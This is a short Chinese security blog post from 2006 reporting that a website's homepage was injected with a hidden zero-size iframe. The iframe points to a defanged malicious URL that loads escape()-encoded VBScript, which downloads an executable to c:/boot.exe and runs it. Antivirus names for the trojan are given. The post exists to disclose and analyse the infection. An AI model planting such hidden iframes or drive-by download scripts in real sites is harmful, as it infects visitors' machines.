endurer 原创
2006-12-06 第1版
该网站首页末被<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加入</a></nobr>代码:
/--------
<iframe src=hxxp://www.z*z***yqr.com/z*l/wm.htm width=0 height=0 frameborder=0></iframe>
--------/
wm.htm 的内容为escape()<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加密</a></nobr>的VBscrīpt<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>脚本</a></nobr>代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 z*l.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
z*l.exe Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm,<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>瑞星</a></nobr>报为Trojan.DL.Multi.wen。